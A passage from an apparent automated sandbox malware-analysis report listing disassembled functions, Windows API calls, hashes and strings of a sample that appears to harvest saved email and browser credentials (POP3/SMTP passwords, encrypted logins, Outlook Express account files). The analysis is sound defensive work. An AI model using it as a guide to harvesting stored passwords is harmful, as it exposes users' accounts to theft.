                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                  Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 445 410dbb-410dd2 call 410d0e 448 410dd4-410ddd call 4070ae 445->448 449 410dfd-410e1b memset 445->449 456 410ddf-410de2 448->456 457 410dee-410df1 448->457 450 410e27-410e35 449->450 451 410e1d-410e20 449->451 455 410e45-410e4f call 410a9c 450->455 451->450 454 410e22-410e25 451->454 454->450 458 410e37-410e40 454->458 464 410e51-410e79 call 410d3d call 410add RegCloseKey 455->464 465 410e7f-410e92 _mbscpy 455->465 456->449 460 410de4-410de7 456->460 463 410df8 457->463 458->455 460->449 462 410de9-410dec 460->462 462->449 462->457 467 410e95-410e97 463->467 464->465 465->467
                  APIs
                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                  • memset.MSVCRT ref: 00410E10
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                  • _mbscpy.MSVCRT ref: 00410E87
                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 889583718-2036018995
                  • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                  • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                  Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                  Download Yara Rule
                  APIs
                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID:
                  • API String ID: 3473537107-0
                  • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                  • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                  • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                  • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                  Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004109F7
                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                    • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                  • memset.MSVCRT ref: 00410A32
                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                  • String ID:
                  • API String ID: 3143880245-0
                  • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                  • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                  Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@
                  • String ID:
                  • API String ID: 1033339047-0
                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                  Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@mallocmemcpy
                  • String ID:
                  • API String ID: 3831604043-0
                  • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                  • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                  Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFontIndirect_mbscpymemset
                  • String ID: Arial
                  • API String ID: 3853255127-493054409
                  • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                  • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                  • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                  • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                  Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                  Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                  • _strcmpi.MSVCRT ref: 0040CEC3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$_strcmpimemset
                  • String ID: /stext
                  • API String ID: 520177685-3817206916
                  • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                  • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                  • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                  • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                  Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                  Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                  Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID:
                  • API String ID: 145871493-0
                  • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                  • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                  • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                  • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                  Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfile$StringWrite_itoamemset
                  • String ID:
                  • API String ID: 4165544737-0
                  • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                  • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                  • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                  • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                  Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                  • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                  • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                  • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                  Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                  • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                  • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                  • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                  Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                  • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                  • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                  • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                  Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: EnumNamesResource
                  • String ID:
                  • API String ID: 3334572018-0
                  • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                  • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                  • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                  • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                  Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                  • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                  • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                  • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                  Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                  • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                  • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                  • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                  Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                  • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                  • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                  • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                  Non-executed Functions

                  Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString_mbscmpstrlen
                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                  • API String ID: 3963849919-1658304561
                  • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                  • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                  • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                  • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                  Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID: (yE$(yE$(yE
                  • API String ID: 1865533344-362086290
                  • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                  • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                  • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                  • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                  Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                    • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                    • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                    • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                  • memset.MSVCRT ref: 0040E5B8
                  • memset.MSVCRT ref: 0040E5CD
                  • _mbscpy.MSVCRT ref: 0040E634
                  • _mbscpy.MSVCRT ref: 0040E64A
                  • _mbscpy.MSVCRT ref: 0040E660
                  • _mbscpy.MSVCRT ref: 0040E676
                  • _mbscpy.MSVCRT ref: 0040E68C
                  • _mbscpy.MSVCRT ref: 0040E69F
                  • memset.MSVCRT ref: 0040E6B5
                  • memset.MSVCRT ref: 0040E6CC
                    • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                    • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                  • memset.MSVCRT ref: 0040E736
                  • memset.MSVCRT ref: 0040E74F
                  • sprintf.MSVCRT ref: 0040E76D
                  • sprintf.MSVCRT ref: 0040E788
                  • _strcmpi.MSVCRT ref: 0040E79E
                  • _strcmpi.MSVCRT ref: 0040E7B7
                  • _strcmpi.MSVCRT ref: 0040E7D3
                  • memset.MSVCRT ref: 0040E858
                  • sprintf.MSVCRT ref: 0040E873
                  • _strcmpi.MSVCRT ref: 0040E889
                  • _strcmpi.MSVCRT ref: 0040E8A5
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                  • API String ID: 4171719235-3943159138
                  • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                  • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                  • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                  • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                  Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                  • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                  • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                  • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                  • GetWindowRect.USER32(00000000,?), ref: 0041047C
                  • GetWindowRect.USER32(?,?), ref: 00410487
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                  • GetDC.USER32 ref: 004104E2
                  • strlen.MSVCRT ref: 00410522
                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                  • ReleaseDC.USER32(?,?), ref: 00410580
                  • sprintf.MSVCRT ref: 00410640
                  • SetWindowTextA.USER32(?,?), ref: 00410654
                  • SetWindowTextA.USER32(?,00000000), ref: 00410672
                  • GetDlgItem.USER32(?,00000001), ref: 004106A8
                  • GetWindowRect.USER32(00000000,?), ref: 004106B8
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                  • GetClientRect.USER32(?,?), ref: 004106DD
                  • GetWindowRect.USER32(?,?), ref: 004106E7
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                  • GetClientRect.USER32(?,?), ref: 00410737
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                  • String ID: %s:$EDIT$STATIC
                  • API String ID: 1703216249-3046471546
                  • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                  • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                  • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                  • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                  Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004024F5
                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                  • _mbscpy.MSVCRT ref: 00402533
                  • _mbscpy.MSVCRT ref: 004025FD
                  Strings
                  Memory Dump Source
